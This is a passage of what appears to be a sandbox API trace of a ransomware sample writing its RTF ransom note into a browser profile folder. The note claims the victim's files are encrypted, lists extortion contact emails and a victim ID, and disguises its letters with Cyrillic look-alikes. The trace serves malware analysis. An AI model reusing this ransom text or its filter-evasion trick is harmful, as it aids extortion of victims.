\\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nÔ48Õ>*c\x98¿PËxf]ê\x8ac¤\x1eîJ\x09ÇY5ø}\"\x1f¯·èE\x1e\x1b\x9a®*À\x83èlÁÝ9\x99\x91i\x09\x9dÃø\x06Öå¥{\x9cÚ\x14\\\x7fÀï\x1b\x02\x03¬s\räç\x7f\x99õ c§¾\x9fÞ\x8bØfì¯ÜVËÞÏIîO¾@,nåèJê\x97\x03w\x07Ôr\x87\x13­4×¾\x80B=ÿƨ­DĨÊƶ\x19bonv|ßu5±\x12Qe\x7f\x9a\x8f\x02RùÿÙ¡ÃÀkI>o Ø\x95&Fk\x09²bß\x8a¨n*N\x0c-¶\x07º3_¨42>\x9b§g¶r ê\x91\x02Çy\x98\x1f\x99f±{\r9£", lpUsedDefaultChar=0x0) returned 7247 [0066.726] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.727] CloseHandle (hObject=0x1cc) returned 1 [0066.727] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\bg85_info.rtf")) returned 0xffffffff [0066.727] GetLastError () returned 0x2 [0066.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in 